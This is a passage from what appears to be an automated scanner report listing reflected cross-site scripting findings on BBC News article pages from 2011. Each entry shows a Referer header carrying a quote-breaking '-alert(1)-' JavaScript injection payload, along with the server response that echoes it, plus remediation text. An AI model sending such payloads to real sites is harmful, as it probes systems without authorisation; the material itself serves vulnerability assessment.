       serverTime: 1297476193000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=5cbf7'-alert(1)-'1db4f3eedab',
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428754',
       assetType: 'story',
       uri: '/news/magazine-
...[SNIP]...

1.74. http://www.bbc.co.uk/news/magazine-12428759 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428759

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b22b'-alert(1)-'4a9a1953a1b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12428759 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7b22b'-alert(1)-'4a9a1953a1b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=782
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=e4fda5452e1ae6980b8b68bc8193e4e228c0316270e081492b6be2adf46f013e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e4fda5452e1ae6980b8b68bc8193e4e228c0316270e081492b6be2adf46f013e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 101336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476200000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7b22b'-alert(1)-'4a9a1953a1b',
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428759',
       assetType: 'story',
       uri: '/news/magazine-
...[SNIP]...

1.75. http://www.bbc.co.uk/news/science-environment-12412662 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12412662

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7ccf'-alert(1)-'71f05dbe4a5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12412662 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d7ccf'-alert(1)-'71f05dbe4a5

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=783
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=d43dd545ce8a06a47a538b7b01afefd5d556283d3080b1e97bcb439f4195376a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d43dd545ce8a06a47a538b7b01afefd5d556283d3080b1e97bcb439f4195376a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476196000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d7ccf'-alert(1)-'71f05dbe4a5',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12412662',
       assetType: 'st
...[SNIP]...

1.76. http://www.bbc.co.uk/news/science-environment-12417858 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12417858

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7b1c'-alert(1)-'62e041ac4f8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12417858 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b7b1c'-alert(1)-'62e041ac4f8

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=780
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=b41df5253e8a86f31a612a1a5188c689ee1879aaa04021a95bcb03c2d71d39ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b41df5253e8a86f31a612a1a5188c689ee1879aaa04021a95bcb03c2d71d39ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476195000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=b7b1c'-alert(1)-'62e041ac4f8',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12417858',
       assetType: 'st
...[SNIP]...

1.77. http://www.bbc.co.uk/news/science-environment-12424620 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12424620

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a9de'-alert(1)-'05847a715b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12424620 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a9de'-alert(1)-'05847a715b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:18 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:18 GMT
Connection: close
Set-Cookie: BBC-UID=144d75e59ecaa6460b3922e3912a2b214aa5a163e000524317cd83d40c0893500Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=144d75e59ecaa6460b3922e3912a2b214aa5a163e000524317cd83d40c0893500Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 46598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476198000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1a9de'-alert(1)-'05847a715b',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12424620',
       assetType: 'ph
...[SNIP]...

1.78. http://www.bbc.co.uk/news/technology-12419672 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12419672

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3c0c'-alert(1)-'cbbb8f8eed2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology-12419672 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f3c0c'-alert(1)-'cbbb8f8eed2

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=776
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=54bd55551eca96c5fac8fce4119595cd3f5f4210d020a1aa748bda75429125040Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54bd55551eca96c5fac8fce4119595cd3f5f4210d020a1aa748bda75429125040Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476197000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=f3c0c'-alert(1)-'cbbb8f8eed2',
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12419672',
       assetType: 'story',
       uri: '/news/techn
...[SNIP]...

1.79. http://www.bbc.co.uk/news/technology-12429808 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12429808

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e41b9'-alert(1)-'07f6b7abb93 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology-12429808 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e41b9'-alert(1)-'07f6b7abb93

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:18 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:18 GMT
Connection: close
Set-Cookie: BBC-UID=94dd25a5beeab646aa43d235a1935e56d65d40ed4050e1895b4bb37e58adf3ca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94dd25a5beeab646aa43d235a1935e56d65d40ed4050e1895b4bb37e58adf3ca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476198000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=e41b9'-alert(1)-'07f6b7abb93',
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12429808',
       assetType: 'story',
       uri: '/news/techn
...[SNIP]...

1.80. http://www.bbc.co.uk/news/uk-12427839 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12427839

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2eb1b'-alert(1)-'8724c7376a9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12427839 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2eb1b'-alert(1)-'8724c7376a9

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=742
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=042da5c53eca2628866cf59c51ed819ee4d8a7d06050a10a04cb8a056d600a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=042da5c53eca2628866cf59c51ed819ee4d8a7d06050a10a04cb8a056d600a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 67629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476200000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=2eb1b'-alert(1)-'8724c7376a9',
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427839',
       assetType: 'story',
       uri: '/news/uk-12427839',
       coun
...[SNIP]...

1.81. http://www.bbc.co.uk/news/uk-12437244 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12437244

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload addf5'-alert(1)-'815ccfa00f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12437244 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=addf5'-alert(1)-'815ccfa00f5

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=843d65c56eca3628a68c95df312714562a75ecac40f0810ad40b7a458d008afa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=843d65c56eca3628a68c95df312714562a75ecac40f0810ad40b7a458d008afa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476200000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=addf5'-alert(1)-'815ccfa00f5',
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437244',
       assetType: 'story',
       uri: '/news/uk-12437244',
       coun
...[SNIP]...

1.82. http://www.bbc.co.uk/news/uk-england-london-12438040 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-12438040

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6670'-alert(1)-'f959d1761eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-england-london-12438040 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a6670'-alert(1)-'f959d1761eb

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:21 GMT
Keep-Alive: timeout=10, max=756
Expires: Sat, 12 Feb 2011 02:03:21 GMT
Connection: close
Set-Cookie: BBC-UID=242d95f5fe2a9649dabdcdd091ea970bb5c909e7d01041092b7b23ee805e64ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:21 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=242d95f5fe2a9649dabdcdd091ea970bb5c909e7d01041092b7b23ee805e64ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476201000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=a6670'-alert(1)-'f959d1761eb',
       section: 'london',
       sectionPath: '/England/London',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12438040',
       assetType: 'story',
       uri: '/news/uk-en
...[SNIP]...

1.83. http://www.bbc.co.uk/news/uk-northern-ireland-12427112 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12427112

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adb77'-alert(1)-'ac0d9679f22 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-northern-ireland-12427112 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=adb77'-alert(1)-'ac0d9679f22

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=743
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=74cdc5054e7a66baca0699cb21e6298c20cf357ea0b0c1ca747bfa65afa12cd60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74cdc5054e7a66baca0699cb21e6298c20cf357ea0b0c1ca747bfa65afa12cd60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476202000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=adb77'-alert(1)-'ac0d9679f22',
       section: 'northern-ireland',
       sectionPath: '/Northern Ireland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427112',
       assetType: 'story',
       uri:
...[SNIP]...

1.84. http://www.bbc.co.uk/news/uk-northern-ireland-12428837 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12428837

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6007c'-alert(1)-'aa5a9db598a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-northern-ireland-12428837 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6007c'-alert(1)-'aa5a9db598a

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=734
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=041de5c5ae7a263b0f30a7c8619c953d60950a88c020915ab4db4ae541e1face0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
